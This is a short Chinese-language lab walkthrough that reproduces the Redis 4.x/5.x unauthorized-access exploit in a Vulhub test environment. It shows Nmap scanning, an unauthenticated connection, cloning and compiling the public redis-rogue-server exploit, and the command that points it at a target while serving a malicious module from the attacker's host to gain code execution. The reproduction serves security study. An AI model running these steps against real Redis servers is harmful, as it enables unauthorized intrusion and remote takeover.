Redis 4.x5.x 未授权访问漏洞EXP复现过程
本次使用Vulhub一键搭建漏洞测试靶场 地址:https://vulhub.org/#/environments/redis/4-unacc/ 搭建过程就不讲了
可以看到已经启动docker了
Nmap探测一下靶机端口
如上图所示,redis服务正常开启了,在6379端口
kali直接用redis连接,发现可直接访问,还能通过info命令查看到服务器等一些敏感信息
然后将exp git clone 到本地 https://github.com/n0b0dyCN/redis-rogue-server
cd 到目录 redis-rogue-server /RedisModulesSDK/exp/
然后 make 进行编译,目录下会多一个exp.so文件
然后回到 redis-rogue-server.py / 目录下
输入命令:./redis-rogue-server.py --rhost 192.168.124.148 --lhost 192.168.124.134
如果这样报错的话,就需要指定python3
python3 ./redis-rogue-server.py --rhost 192.168.124.148 --lhost 192.168.124.134